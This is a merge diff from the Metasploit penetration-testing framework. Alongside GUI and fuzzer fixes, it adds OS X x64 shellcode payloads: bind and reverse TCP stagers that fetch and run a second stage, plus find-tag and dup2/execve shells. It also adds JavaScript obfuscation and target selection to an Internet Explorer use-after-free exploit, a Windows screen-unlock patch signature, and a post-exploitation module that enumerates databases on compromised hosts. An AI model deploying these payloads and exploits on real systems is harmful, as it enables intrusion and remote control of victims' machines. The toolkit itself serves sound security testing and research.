Merge branch 'upstream-master'

external/source/gui/msfguijava/src/msfgui/DraggableTabbedPane.java

@@ -13,6 +13,7 @@ import java.awt.event.FocusListener;
 import java.awt.event.MouseAdapter;
 import java.awt.event.MouseEvent;
 import java.awt.event.MouseMotionAdapter;
+import java.awt.event.MouseMotionListener;
 import java.awt.event.WindowEvent;
 import java.awt.event.WindowFocusListener;
 import java.util.ArrayList;
@@ -49,7 +50,16 @@ public class DraggableTabbedPane extends JTabbedPane{
 	static{
 		//Set up placeholder window. (Shows when moving tabs)
 		window = new JWindow();
-		window.getContentPane().add(new JLabel("Moving", JLabel.CENTER), java.awt.BorderLayout.CENTER);
+		JLabel lab = new JLabel("Moving", JLabel.CENTER);
+		lab.addMouseMotionListener(new MouseMotionListener() {
+			public void mouseMoved(MouseEvent e) {
+				window.setVisible(false);
+			}
+			public void mouseDragged(MouseEvent e) {
+				window.setVisible(false);
+			}
+		});
+		window.getContentPane().add(lab, java.awt.BorderLayout.CENTER);
 		window.setSize(300, 300);
 	}
 
@@ -333,7 +343,7 @@ public class DraggableTabbedPane extends JTabbedPane{
 		//Set up dragging listener
 		addMouseMotionListener(new MouseMotionAdapter() {
 			public void mouseDragged(MouseEvent e) {
-				if (!dragging) {
+				if (!dragging && ((e.getModifiersEx() & MouseEvent.BUTTON1_DOWN_MASK) != 0)) {
 					// Gets the tab index based on the mouse position
 					int tabNumber = getUI().tabForCoordinate(DraggableTabbedPane.this, e.getX(), e.getY());
 					if (tabNumber < 0)

external/source/gui/msfguijava/src/msfgui/RpcConnection.java

@@ -114,7 +114,8 @@ public abstract class RpcConnection {
 	 * @throws IOException
 	 */
 	protected void disconnect() throws SocketException, IOException{
-		connection.close();
+		if(connection != null)
+			connection.close();
 	}
 
 	/**

modules/auxiliary/admin/http/scrutinizer_add_user.rb

@@ -6,7 +6,6 @@
 ##
 
 require 'msf/core'
-require 'json'
 
 class Metasploit3 < Msf::Auxiliary
 
@@ -45,7 +44,6 @@ class Metasploit3 < Msf::Auxiliary
 			], self.class)
 	end
 
-
 	def run
 		res = send_request_cgi({
 			'method'    => 'POST',
@@ -63,6 +61,13 @@ class Metasploit3 < Msf::Auxiliary
 			return
 		end
 
+		begin
+			require 'json'
+		rescue LoadError
+			print_error("Json is not available on your machine")
+			return
+		end
+
 		begin
 			j = JSON.parse(res.body)
 
@@ -78,7 +83,6 @@ class Metasploit3 < Msf::Auxiliary
 		rescue JSON::ParserError
 			print_error("Unable to parse JSON")
 			print_line(res.body)
-
 		end
 	end
 

modules/auxiliary/fuzzers/http/http_form_field.rb

@@ -25,10 +25,10 @@ class Metasploit3 < Msf::Auxiliary
 		super(update_info(info,
 			'Name'           => 'HTTP Form Field Fuzzer',
 			'Description'    => %q{
-						This module will grab all fields from a form,
-						and launch a series of POST actions, fuzzing the contents
-						of the form fields. You can optionally fuzz headers too
-						(option is enabled by default)
+				This module will grab all fields from a form,
+				and launch a series of POST actions, fuzzing the contents
+				of the form fields. You can optionally fuzz headers too
+				(option is enabled by default)
 			},
 			'Author'  => [
 				'corelanc0d3r',
@@ -69,28 +69,12 @@ class Metasploit3 < Msf::Auxiliary
 			proto = "https://"
 		end
 
-		useragent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15"
-		if datastore['UserAgent'] != nil
-			if datastore['UserAgent'].length > 0
-				useragent = datastore['UserAgent']
-			end
-		end
-
-		host = datastore['RHOST']
-		if datastore['VHOST']
-			if datastore['VHOST'].length > 0
-				host = datastore['VHOST']
-			end
-		end
-
 		@send_data = {
 				:uri => '',
 				:version => '1.1',
 				:method => 'POST',
 				:headers => {
 					'Content-Length' => 100,
-					'Host' => host,
-					'User-Agent' => useragent,
 					'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
 					'Accept-Language' => 'en-us,en;q=0.5',
 					'Accept-Encoding' => 'gzip,deflate',
@@ -98,12 +82,10 @@ class Metasploit3 < Msf::Auxiliary
 					'Keep-Alive' => '300',
 					'Connection' => 'keep-alive',
 					'Referer' => proto + datastore['RHOST'] + ":" + datastore['RPORT'].to_s,
-					'Content-Type' => 'application/x-www-form-urlencoded',
+					'Content-Type' => 'application/x-www-form-urlencoded'
 				}
 			}
 		@get_data_headers = {
-				'Host' => host,
-				'User-Agent' => useragent,
 				'Referer' => proto + datastore['RHOST'] + ":" + datastore['RPORT'].to_s,
 			}
 	end
@@ -272,6 +254,8 @@ class Metasploit3 < Msf::Auxiliary
 			end
 			datastr=datastr[0,datastr.length-1]
 			@send_data[:uri] = form[:action]
+			@send_data[:uri] = "/#{form[:action]}" if @send_data[:uri][0,1] != '/'
+
 			@send_data[:method] = form[:method].upcase
 			response = send_fuzz(@send_data,datastr)
 			if not process_response(response,field,"field")
@@ -322,7 +306,7 @@ class Metasploit3 < Msf::Auxiliary
 	end
 
 	def get_field_val(input)
-		tmp = input.split(/=/)
+		tmp = input.split(/\=/)
 		#get delimeter
 		tmp2 = tmp[1].strip
 		delim = tmp2[0,1]
@@ -435,7 +419,7 @@ class Metasploit3 < Msf::Auxiliary
 										location = fielddata[0].index(thisfield)
 										delta = fielddata[0].size - location
 										remaining = fielddata[0][location,delta]
-										tmp = remaining.strip.split(/=/)
+										tmp = remaining.strip.split(/\=/)
 										if tmp.size > 1
 											delim = tmp[1][0,1]
 											tmp2 = tmp[1].split(delim)

modules/exploits/linux/http/zen_load_balancer_exec.rb

@@ -29,6 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'References'     =>
 				[
+					['OSVDB', '85654'],
 					['URL', 'http://itsecuritysolutions.org/2012-09-21-ZEN-Load-Balancer-v2.0-and-v3.0-rc1-multiple-vulnerabilities/']
 				],
 			'DefaultOptions'  =>

modules/exploits/multi/http/auxilium_upload_exec.rb

@@ -30,6 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'References'     =>
 				[
+					['OSVDB', '85554'],
 					['EDB', '21329']
 				],
 			'Payload'        =>

modules/exploits/windows/browser/ie_execcommand_uaf.rb

@@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'License'        => MSF_LICENSE,
 			'Author'         =>
 				[
-					'unknown',     # Some secret ninja
+					'unknown',     # via ZDI
 					'eromang',     # First public discovery
 					'binjo',
 					'sinn3r',      # Metasploit
@@ -78,27 +78,40 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Privileged'     => false,
 			'DisclosureDate' => "Sep 14 2012",  # When it was spotted in the wild by eromang
 			'DefaultTarget'  => 0))
+
+		register_options(
+			[
+				OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
+			], self.class)
+
 	end
 
 	def get_target(agent)
 		#If the user is already specified by the user, we'll just use that
 		return target if target.name != 'Automatic'
 
-		if agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
-			return targets[1]  #IE 7 on Windows XP SP3
-		elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
-			return targets[2]  #IE 8 on Windows XP SP3
-		elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
-			return targets[3]  #IE 7 on Windows Vista
-		elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 8/
-			return targets[4]  #IE 8 on Windows Vista
-		elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8/
-			return targets[5]  #IE 8 on Windows 7
-		elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 9/
-			return targets[6]  #IE 9 on Windows 7
-		else
-			return nil
+		nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
+		ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
+
+		ie_name = "IE #{ie}"
+
+		case nt
+		when '5.1'
+			os_name = 'Windows XP SP3'
+		when '6.0'
+			os_name = 'Windows Vista'
+		when '6.1'
+			os_name = 'Windows 7'
 		end
+
+		targets.each do |t|
+			if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
+				vprint_status("Target selected as: #{t.name}")
+				return t
+			end
+		end
+
+		return nil
 	end
 
 	def junk(n=4)
@@ -283,8 +296,12 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 
 		js = heaplib(js, {:noobfu => true})
+		if datastore['OBFUSCATE']
+			js = ::Rex::Exploitation::JSObfu.new(js)
+			js.obfuscate
+		end
 
-		html = <<-EOS
+		html = %Q|
 		<html>
 			<body>
 				<script>
@@ -299,7 +316,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		        </script>
 			</body>
 		</html>
-		EOS
+		|
 
 		return html
 	end
@@ -335,10 +352,13 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def on_request_uri(cli, request)
-		print_status request.headers['User-Agent']
-		agent = request.headers['User-Agent']
+		uri       = request.uri
+		agent     = request.headers['User-Agent']
 		my_target = get_target(agent)
 
+		vprint_status("Requesting: #{uri}")
+		print_status(agent)
+
 		# Avoid the attack if the victim doesn't have the same setup we're targeting
 		if my_target.nil?
 			print_error("Browser not supported, sending a 404: #{agent.to_s}")
@@ -346,15 +366,13 @@ class Metasploit3 < Msf::Exploit::Remote
 			return
 		end
 
-		vprint_status("Requesting: #{request.uri}")
-
-		if request.uri =~ /#{@html2_name}/
+		if uri =~ /#{@html2_name}/
 			print_status("Loading #{@html2_name}")
 			html = load_html2
-		elsif request.uri =~ /#{@html1_name}/
+		elsif uri =~ /#{@html1_name}/
 			print_status("Loading #{@html1_name}")
 			html = load_html1(cli, my_target)
-		elsif request.uri =~ /\/$/ or request.uri =~ /#{this_resource}$/
+		elsif uri =~ /\/$/ or (!this_resource.empty? and uri =~ /#{this_resource}$/)
 			print_status("Redirecting to #{@html1_name}")
 			send_redirect(cli, "#{this_resource}/#{@html1_name}")
 			return

modules/payloads/singles/osx/x64/say.rb

@@ -0,0 +1,53 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+
+require 'msf/core'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'OSX X64 say Shellcode',
+			'Version'       => '$Revision$',
+			'Description'   => 'Say an arbitrary string outloud using Mac OS X text2speech',
+			'Author'        => 'nemo <nemo[at]felinemenace.org>',
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'osx',
+			'Arch'          => ARCH_X86_64
+		))
+
+		# exec payload options
+		register_options(
+			[
+				OptString.new('TEXT',  [ true,  "The text to say", "Hello\!"]),
+		], self.class)
+	end
+
+	# build the shellcode payload dynamically based on the user-provided CMD
+	def generate
+		say = (datastore['TEXT'] || '') << "\x00"
+		call = "\xe8" + [say.length + 0xd].pack('V')
+
+		payload =
+			"\x48\x31\xC0" +                    # xor rax,rax
+			"\xB8\x3B\x00\x00\x02" +            # mov eax,0x200003b
+			call + 
+			"/usr/bin/say\x00" + 
+			say +
+			"\x48\x8B\x3C\x24" +                # mov rdi,[rsp] 
+			"\x4C\x8D\x57\x0D" +                # lea r10,[rdi+0xd]
+			"\x48\x31\xD2" +                    # xor rdx,rdx
+			"\x52" +                            # push rdx
+			"\x41\x52" +                        # push r10
+			"\x57" +                            # push rdi
+			"\x48\x89\xE6" +                    # mov rsi,rsp
+			"\x0F\x05"                          # loadall286
+	end
+end

modules/payloads/singles/osx/x64/shell_find_tag.rb

@@ -0,0 +1,84 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/find_tag'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Payload::Osx
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'OSX Command Shell, Find Tag Inline',
+			'Version'       => '$Revision$',
+			'Description'   => 'Spawn a shell on an established connection (proxy/nat safe)',
+			'Author'        => 'nemo <nemo[at]felinemenace.org>',
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'osx',
+			'Arch'          => ARCH_X86_64,
+			'Handler'       => Msf::Handler::FindTag,
+			'Session'       => Msf::Sessions::CommandShellUnix
+
+			))
+			# exec payload options
+			register_options(
+				[
+					OptString.new('CMD',  [ true,  "The command string to execute", "/bin/sh" ]),
+					OptString.new('TAG',  [ true,  "The tag to test for", "NEMO" ]),
+			], self.class)
+	end
+
+	#
+	# ensures the setting of tag to a four byte value
+	#
+	def generate
+		cmd  = (datastore['CMD'] || '') << "\x00"
+		call = "\xe8" + [cmd.length].pack('V')
+
+		payload = 
+			 "\x48\x31\xFF" +                    # xor rdi,rdi
+			 "\x57" +                            # push rdi
+			 "\x48\x89\xE6" +                    # mov rsi,rsp
+			 "\x6A\x04" +                        # push byte +0x4
+			 "\x5A" +                            # pop rdx
+			 "\x48\x8D\x4A\xFE" +                # lea rcx,[rdx-0x2]
+			 "\x4D\x31\xC0" +                    # xor r8,r8
+			 "\x4D\x31\xC9" +                    # xor r9,r9
+			 "\x48\xFF\xCF" +                    # dec rdi
+			 "\x48\xFF\xC7" +                    # inc rdi
+			 "\xB8\x1D\x00\x00\x02" +            # mov eax,0x200001d
+			 "\x0F\x05" +                        # loadall286
+			 "\x81\x3C\x24" +                    # cmp dword [rsp],0x4e454d4f
+			 datastore['TAG'] + 
+			 "\x75\xED" +                        # jnz 0x17
+			 "\x48\x31\xC9" +                    # xor rcx,rcx
+			 "\xB8\x1D\x00\x00\x02" +            # mov eax,0x200001d
+			 "\x0F\x05" +                        # loadall286
+			 "\xB8\x5A\x00\x00\x02" +            # mov eax,0x200005a
+			 "\x48\x31\xF6" +                    # xor rsi,rsi
+			 "\x0F\x05" +                        # loadall286
+			 "\xB8\x5A\x00\x00\x02" +            # mov eax,0x200005a
+			 "\x48\xFF\xC6" +                    # inc rsi
+			 "\x0F\x05" +                        # loadall286
+			 "\x48\x31\xC0" +                    # xor rax,rax
+			 "\xB8\x3B\x00\x00\x02" +            # mov eax,0x200003b
+			 call +
+			 cmd +
+			 "\x48\x8B\x3C\x24" +                # mov rdi,[rsp]
+			 "\x48\x31\xD2" +                    # xor rdx,rdx
+			 "\x52" +                            # push rdx
+			 "\x57" +                            # push rdi
+			 "\x48\x89\xE6" +                    # mov rsi,rsp
+			 "\x0F\x05"                          # loadall286
+	end
+
+end

modules/payloads/stagers/osx/x64/bind_tcp.rb

@@ -0,0 +1,101 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+
+module Metasploit3
+
+	include Msf::Payload::Stager
+
+	def initialize(info = { })
+		super(merge_info(info,
+			'Name'        => 'Bind TCP Stager',
+			'Version'     => '$Revision$',
+			'Description' => 'Listen, read length, read buffer, execute',
+			'Author'      => 'nemo <nemo[at]felinemenace.org>',
+			'License'     => MSF_LICENSE,
+			'Platform'    => 'osx',
+			'Arch'        => ARCH_X86_64,
+			'Handler'     => Msf::Handler::BindTcp,
+			'Convention'  => 'sockedi',
+			'Stager'      =>
+			{
+				'Offsets' => { 'LPORT' => [ 31, 'n'] },
+				'Payload' =>
+					 "\xB8\x61\x00\x00\x02" +     # mov eax,0x2000061
+					 "\x6A\x02" +                 # push byte +0x2
+					 "\x5F" +                     # pop rdi
+					 "\x6A\x01" +                 # push byte +0x1
+					 "\x5E" +                     # pop rsi
+					 "\x48\x31\xD2" +             # xor rdx,rdx
+					 "\x0F\x05" +                 # loadall286
+					 "\x48\x89\xC7" +             # mov rdi,rax
+					 "\xB8\x68\x00\x00\x02" +     # mov eax,0x2000068
+					 "\x48\x31\xF6" +             # xor rsi,rsi
+					 "\x56" +                     # push rsi
+					 "\xBE\x00\x02\x15\xB3" +     # mov esi,0xb3150200
+					 "\x56" +                     # push rsi
+					 "\x48\x89\xE6" +             # mov rsi,rsp
+					 "\x6A\x10" +                 # push byte +0x10
+					 "\x5A" +                     # pop rdx
+					 "\x0F\x05" +                 # loadall286
+					 "\xB8\x6A\x00\x00\x02" +     # mov eax,0x200006a
+					 "\x48\x31\xF6" +             # xor rsi,rsi
+					 "\x48\xFF\xC6" +             # inc rsi
+					 "\x49\x89\xFC" +             # mov r12,rdi
+					 "\x0F\x05" +                 # loadall286
+					 "\xB8\x1E\x00\x00\x02" +     # mov eax,0x200001e
+					 "\x4C\x89\xE7" +             # mov rdi,r12
+					 "\x48\x89\xE6" +             # mov rsi,rsp
+					 "\x48\x89\xE2" +             # mov rdx,rsp
+					 "\x48\x83\xEA\x04" +         # sub rdx,byte +0x4
+					 "\x0F\x05" +                 # loadall286
+					 "\x49\x89\xC5" +             # mov r13,rax
+					 "\x48\x89\xC7" +             # mov rdi,rax
+					 "\xB8\x1D\x00\x00\x02" +     # mov eax,0x200001d
+					 "\x48\x31\xC9" +             # xor rcx,rcx
+					 "\x51" +                     # push rcx
+					 "\x48\x89\xE6" +             # mov rsi,rsp
+					 "\xBA\x04\x00\x00\x00" +     # mov edx,0x4
+					 "\x4D\x31\xC0" +             # xor r8,r8
+					 "\x4D\x31\xD2" +             # xor r10,r10
+					 "\x0F\x05" +                 # loadall286
+					 "\x41\x5B" +                 # pop r11
+					 "\x4C\x89\xDE" +             # mov rsi,r11
+					 "\x81\xE6\x00\xF0\xFF\xFF" + # and esi,0xfffff000
+					 "\x81\xC6\x00\x10\x00\x00" + # add esi,0x1000
+					 "\xB8\xC5\x00\x00\x02" +     # mov eax,0x20000c5
+					 "\x48\x31\xFF" +             # xor rdi,rdi
+					 "\x48\xFF\xCF" +             # dec rdi
+					 "\xBA\x07\x00\x00\x00" +     # mov edx,0x7
+					 "\x41\xBA\x02\x10\x00\x00" + # mov r10d,0x1002
+					 "\x49\x89\xF8" +             # mov r8,rdi
+					 "\x4D\x31\xC9" +             # xor r9,r9
+					 "\x0F\x05" +                 # loadall286
+					 "\x48\x89\xC6" +             # mov rsi,rax
+					 "\x56" +                     # push rsi
+					 "\x4C\x89\xEF" +             # mov rdi,r13
+					 "\x48\x31\xC9" +             # xor rcx,rcx
+					 "\x4C\x89\xDA" +             # mov rdx,r11
+					 "\x4D\x31\xC0" +             # xor r8,r8
+					 "\x4D\x31\xD2" +             # xor r10,r10
+					 "\xB8\x1D\x00\x00\x02" +     # mov eax,0x200001d
+					 "\x0F\x05" +                 # loadall286
+					 "\x58" +                     # pop rax
+					 "\xFF\xD0"                   # call rax
+			}
+		))
+	end
+
+	def handle_intermediate_stage(conn, p)
+		#
+		# Our stager payload expects to see a next-stage length first.
+		#
+		conn.put([p.length].pack('V'))
+	end
+end

modules/payloads/stagers/osx/x64/reverse_tcp.rb

@@ -0,0 +1,57 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+
+module Metasploit3
+
+	include Msf::Payload::Stager
+
+	def initialize(info = { })
+		super(merge_info(info,
+			'Name'        => 'Reverse TCP Stager',
+			'Version'     => '$Revision$',
+			'Description' => 'Connect, read length, read buffer, execute',
+			'Author'      => 'nemo <nemo[at]felinemenace.org>',
+			'License'     => MSF_LICENSE,
+			'Platform'    => 'osx',
+			'Arch'        => ARCH_X86_64,
+			'Handler'     => Msf::Handler::ReverseTcp,
+			'Convention'  => 'sockedi',
+			'Stager'      =>
+			{
+				'Offsets' =>
+				{
+					'LHOST' => [ 37, 'ADDR'],
+					'LPORT' => [ 35, 'n']
+				},
+				'Payload' =>
+					"\xb8\x61\x00\x00\x02\x6a\x02\x5f\x6a\x01\x5e\x48" + 
+					"\x31\xd2\x0f\x05\x49\x89\xc5\x48\x89\xc7\xb8\x62" + 
+					"\x00\x00\x02\x48\x31\xf6\x56\x48\xbe\x00\x02\x15" + 
+					"\xb3\x7f\x00\x00\x01\x56\x48\x89\xe6\x6a\x10\x5a" + 
+					"\x0f\x05\x4c\x89\xef\xb8\x1d\x00\x00\x02\x48\x31" + 
+					"\xc9\x51\x48\x89\xe6\xba\x04\x00\x00\x00\x4d\x31" + 
+					"\xc0\x4d\x31\xd2\x0f\x05\x41\x5b\x4c\x89\xde\x81" + 
+					"\xe6\x00\xf0\xff\xff\x81\xc6\x00\x10\x00\x00\xb8" + 
+					"\xc5\x00\x00\x02\x48\x31\xff\x48\xff\xcf\xba\x07" + 
+					"\x00\x00\x00\x41\xba\x02\x10\x00\x00\x49\x89\xf8" + 
+					"\x4d\x31\xc9\x0f\x05\x48\x89\xc6\x56\x4c\x89\xef" + 
+					"\x48\x31\xc9\x4c\x89\xda\x4d\x31\xc0\x4d\x31\xd2" + 
+					"\xb8\x1d\x00\x00\x02\x0f\x05\x58\xff\xd0" 
+			}
+		))
+	end
+
+	def handle_intermediate_stage(conn, p)
+		#
+		# Our stager payload expects to see a next-stage length first.
+		#
+		conn.put([p.length].pack('V'))
+	end
+end

modules/payloads/stages/osx/x64/dupandexecve.rb

@@ -0,0 +1,38 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'OS X dup2 Command Shell',
+			'Version'       => '$Revision$',
+			'Description'   => 'dup2 socket in edi, then execve',
+			'Author'        => 'nemo',
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'osx',
+			'Arch'          => ARCH_X86_64,
+			'Session'       => Msf::Sessions::CommandShell,
+			'Stage'         =>
+				{
+					'Payload' =>
+						"\xb8\x5a\x00\x00\x02\x48\x31\xf6\x0f\x05\xb8\x5a"+ 
+						"\x00\x00\x02\x48\xff\xc6\x0f\x05\x48\x31\xc0\xb8"+ 
+						"\x3b\x00\x00\x02\xe8\x08\x00\x00\x00\x2f\x62\x69"+ 
+						"\x6e\x2f\x73\x68\x00\x48\x8b\x3c\x24\x48\x31\xd2"+ 
+						"\x52\x57\x48\x89\xe6\x0f\x05" 
+				}
+			))
+	end
+
+end

modules/post/windows/escalate/screen_unlock.rb

@@ -62,7 +62,8 @@ class Metasploit3 < Msf::Post
 			{ :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xb76a, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xb827, :os => /Windows Vista/ },
 			{ :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xb391, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xb44e, :os => /Windows Vista/ },
 			{ :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xacf6, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xadb3, :os => /Windows Vista/ },
-			{ :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xe881, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xe93e, :os => /Windows 7/ }
+			{ :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xe881, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xe93e, :os => /Windows 7/ },
+			{ :sig => "8bff558bec83ec50a1",       :sigoffset => 0x97d3, :orig_code => "32c0", :patch => "b001", :patchoffset => 0x9878, :os => /Windows XP.*Service Pack 3 - spanish/ }
 		]
 
 		unsupported if client.platform !~ /win32|win64/i

modules/post/windows/gather/enum_db.rb

@@ -0,0 +1,339 @@
+##
+# ## This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'rex'
+require 'msf/core'
+require 'msf/core/post/file'
+require 'msf/core/post/common'
+require 'msf/core/post/windows/registry'
+
+class Metasploit3 < Msf::Post
+
+	include Msf::Post::File
+	include Msf::Post::Common
+	include Msf::Post::Windows::Registry
+	include Msf::Auxiliary::Report
+
+	def initialize(info={})
+		super( update_info( info,
+			'Name'          => 'Windows Gather Database Instance Enumeration',
+			'Description'   => %q{ This module will enumerate a windows system for installed database instances },
+			'License'       => MSF_LICENSE,
+			'Author'        => [
+				'Barry Shteiman <barry[at]sectorix.com>', # Module author
+				'juan vazquez' # minor help
+			],
+			'Platform'      => [ 'windows' ],
+			'SessionTypes'  => [ 'meterpreter' ]
+		))
+	end
+
+	# method called when command run is issued
+	def run
+
+		results = []
+
+		print_status("Enumerating Databases on #{sysinfo['Computer']}")
+		if check_mssql
+			results += enumerate_mssql
+		end
+		if check_oracle
+			results += enumerate_oracle
+		end
+		if check_db2
+			results += enumerate_db2
+		end
+		if check_mysql
+			results += enumerate_mysql
+		end
+		if check_sybase
+			results += enumerate_sybase
+		end
+
+		if results.empty?
+			print_status("Done, No Databases were found")
+			return
+		end
+
+		print_status("Done, Databases Found.")
+
+		tbl = Rex::Ui::Text::Table.new(
+			'Header'  => "Installed Databases",
+			'Indent'  => 1,
+			'Columns' =>
+				[
+					"Type",
+					"Instance",
+					"Database",
+					"Port"
+				])
+
+		results.each { |r|
+			report_service(:host => session.sock.peerhost, :port => r[3], :name => r[0], :info => "#{r[0]}, #{r[1]}")
+			tbl << r
+		}
+
+		print_line(tbl.to_s)
+		p = store_loot("host.databases", "text/plain", session, tbl.to_s, "databases.txt", "Running Databases")
+		print_status("Results stored in: #{p}")
+
+	end
+
+	##### initial identification methods #####
+
+	# method for Checking if database instances are installed on host - mssql
+	def check_mssql
+		key = "HKLM\\SOFTWARE\\Microsoft"
+		if registry_enumkeys(key).include?("Microsoft SQL Server")
+			print_status("\tMicrosoft SQL Server found.")
+			return true
+		end
+		return false
+	rescue
+		return false
+	end
+
+	# method for Checking if database instances are installed on host - oracle
+	def check_oracle
+		key = "HKLM\\SOFTWARE\\Oracle"
+		if registry_enumkeys(key).include?("ALL_HOMES")
+			print_status("\tOracle Server found.")
+			return true
+		elsif registry_enumkeys(key).include?("SYSMAN")
+			print_status("\tOracle Server found.")
+			return true
+		end
+		return false
+	rescue
+		return false
+	end
+
+	# method for Checking if database instances are installed on host - db2
+	def check_db2
+		key = "HKLM\\SOFTWARE\\IBM\\DB2"
+		if registry_enumkeys(key).include?("GLOBAL_PROFILE")
+			print_status("\tDB2 Server found.")
+			return true
+		end
+		return false
+	rescue
+		return false
+	end
+
+	# method for Checking if database instances are installed on host - mysql
+	def check_mysql
+		key = "HKLM\\SOFTWARE"
+		if registry_enumkeys(key).include?("MySQL AB")
+			print_status("\tMySQL Server found.")
+			return true
+		end
+		return false
+	rescue
+		return false
+	end
+
+	# method for Checking if database instances are installed on host - sybase
+	def check_sybase
+		key = "HKLM\\SOFTWARE\\Sybase"
+		if registry_enumkeys(key).include?("SQLServer")
+			print_status("\tSybase Server found.")
+			return true
+		elsif registry_enumkeys(key).include?("Server")
+			print_status("\tSybase Server found.")
+			return true
+		end
+		return false
+	rescue
+		return false
+	end
+
+	##### deep analysis methods #####
+
+	# method to identify mssql instances
+	def enumerate_mssql
+		results = []
+		key = "HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\Instance Names\\SQL"
+		instances = registry_enumvals(key)
+		if not instances.nil? and not instances.empty?
+			instances.each do |i|
+				tcpkey = "HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\#{registry_getvaldata(key,i)}\\MSSQLServer\\SuperSocketNetLib\\Tcp\\IPAll"
+				tcpport = registry_getvaldata(tcpkey,"TcpPort")
+				print_good("\t\t+ #{registry_getvaldata(key,i)} (Port:#{tcpport})")
+				results << ["mssql","instance:#{registry_getvaldata(key,i)} port:#{tcpport}","Microsoft SQL Server",tcpport]
+			end
+		end
+		return results
+	rescue
+		print_error("\t\t! could not identify information")
+		return results || []
+	end
+
+	# method to identify oracle instances
+	def enumerate_oracle
+		results = []
+		basekey = "HKLM\\SOFTWARE\\Oracle\\SYSMAN"
+		instances = registry_enumkeys(basekey)
+		if instances.nil? or instances.empty?
+			print_error("\t\t! Oracle instances not found")
+			return results
+		end
+
+		instances.each do |i|
+			key = "#{basekey}\\#{i}"
+			val_ORACLE_SID = registry_getvaldata(key,"ORACLE_SID")
+			val_ORACLE_HOME = registry_getvaldata(key,"ORACLE_HOME")
+
+			if not exist?(val_ORACLE_HOME + "\\NETWORK\\ADMIN\\tnsnames.ora")
+				print_error("\t\t! #{val_ORACLE_SID} (No Listener Found)")
+				next
+			end
+
+			data_TNSNAMES = read_file(val_ORACLE_HOME + "\\NETWORK\\ADMIN\\tnsnames.ora")
+			if data_TNSNAMES =~ /PORT\ \=\ (\d+)/
+				port = $1
+				print_good("\t\t+ #{val_ORACLE_SID} (Port:#{port})")
+				results << [ "oracle","instance:#{val_ORACLE_SID} port:#{port}","Oracle Database Server",port ]
+			else
+				print_error("\t\t! #{val_ORACLE_SID} (No Listener Found)")
+			end
+		end
+
+		return results
+
+	rescue
+		print_error("\t\t! could not identify information")
+		return results || []
+	end
+
+	# method to identify mysql instances
+	def enumerate_mysql
+		results = []
+		basekey = "HKLM\\SOFTWARE\\MySQL AB"
+		instances = registry_enumkeys(basekey)
+		if  instances.nil? or instances.empty?
+			return results
+		end
+		instances.each do |i|
+			key = "#{basekey}\\#{i}"
+			val_location = registry_getvaldata(key,"Location")
+
+			data = find_mysql_conf(val_location)
+
+			if data and data =~ /port\=(\d+)/
+				port = $1
+				print_good("\t\t+ MYSQL (Port:#{port})")
